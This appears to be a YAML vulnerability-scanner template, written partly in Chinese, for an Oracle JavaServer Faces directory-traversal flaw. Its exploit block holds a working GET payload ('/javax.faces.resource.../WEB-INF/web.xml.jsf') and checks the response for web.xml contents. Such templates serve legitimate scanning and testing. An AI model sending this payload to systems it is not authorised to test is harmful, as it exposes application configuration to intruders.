product: Java
vName: 'JavaServer javax.faces.resource未授权访问'
type: 访问控制
vID: [ ]
level: 2
vDesc: 'Oracle JavaServer Faces包含多个可能允许攻击者获取敏感信息的漏洞。Coverity安全研究实验室漏洞报告的Alex Kouzemtchenko和Jon Passki表示，Oracle JavaServer Faces包含以下漏洞： 部分目录遍历通过资源标识符（CWE-22）：存在允许在应用程序内进行目录遍历的缺陷。目录遍历是有限的，因为它不能用于从应用程序转义并访问应用程序服务器上的任意文件。部分目录遍历库名（CWE-22）。存在允许在应用程序内进行目录遍历的缺陷。目录遍历是有限的，因为它不能用于从应用程序转义并访问应用程序服务器上的任意文件。加密上下文参数错误记录（CWE-705）。'
version: ''
note: ''
search: { }
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: '/javax.faces.resource.../WEB-INF/web.xml.jsf'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '<web-app'
              - '</web-app>'
            logic: and